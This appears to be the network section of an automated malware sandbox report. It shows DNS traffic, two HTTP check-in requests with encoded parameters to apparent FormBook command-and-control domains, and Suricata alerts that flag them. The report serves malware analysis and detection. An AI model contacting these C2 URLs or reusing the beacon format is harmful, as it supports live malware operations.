Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.5gusaphones.com | 64.190.62.111 | |
| www.drraass.com | 160.121.199.48 |
- UDP Requests
-
-
192.168.56.102:58318 164.124.101.2:53
-
192.168.56.102:60922 164.124.101.2:53
-
192.168.56.102:63203 164.124.101.2:53
-
192.168.56.102:65038 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:65041 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.102:123
-
GET
404
http://www.drraass.com/d6b4/?BZR8DR=ZFjiT42y6P0728e7zdpBA4KxoCmBCCb5Al/LhO89P4sgCaouJTXqFiYZc9VykBwhS3eZep96&VRKt=vBZhY2d0ZnJDbt
REQUEST
RESPONSE
BODY
GET /d6b4/?BZR8DR=ZFjiT42y6P0728e7zdpBA4KxoCmBCCb5Al/LhO89P4sgCaouJTXqFiYZc9VykBwhS3eZep96&VRKt=vBZhY2d0ZnJDbt HTTP/1.1
Host: www.drraass.com
Connection: close
HTTP/1.1 404 Not Found
Transfer-Encoding: chunked
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Mon, 02 Aug 2021 22:53:47 GMT
Connection: close
GET
0
http://www.5gusaphones.com/d6b4/?BZR8DR=TVsDFMPATNjElIxDQdFdIJ7pI7RNJco0RSJv47bENHhP3SgsFs3eKGTcOpqZrd+87WRONrAg&VRKt=vBZhY2d0ZnJDbt
REQUEST
RESPONSE
BODY
GET /d6b4/?BZR8DR=TVsDFMPATNjElIxDQdFdIJ7pI7RNJco0RSJv47bENHhP3SgsFs3eKGTcOpqZrd+87WRONrAg&VRKt=vBZhY2d0ZnJDbt HTTP/1.1
Host: www.5gusaphones.com
Connection: close
HTTP/1.1 200 OK
date: Mon, 02 Aug 2021 22:54:16 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_QVQsVd1FupxkeMutiPJLx3cCQO/kYu3ktF5Qg/rIaivyIRgf/fpAdczZALjsWQjxfaP5G/lyxGCah+Q4cfHMuA==
last-modified: Mon, 02 Aug 2021 22:54:16 GMT
x-cache-miss-from: parking-58759dfcb5-fg79f
server: NginX
connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49165 -> 64.190.62.111:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49165 -> 64.190.62.111:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49165 -> 64.190.62.111:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 160.121.199.48:80 -> 192.168.56.102:49164 | 2400016 | ET DROP Spamhaus DROP Listed Traffic Inbound group 17 | Misc Attack |
| TCP 192.168.56.102:49164 -> 160.121.199.48:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49164 -> 160.121.199.48:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49164 -> 160.121.199.48:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts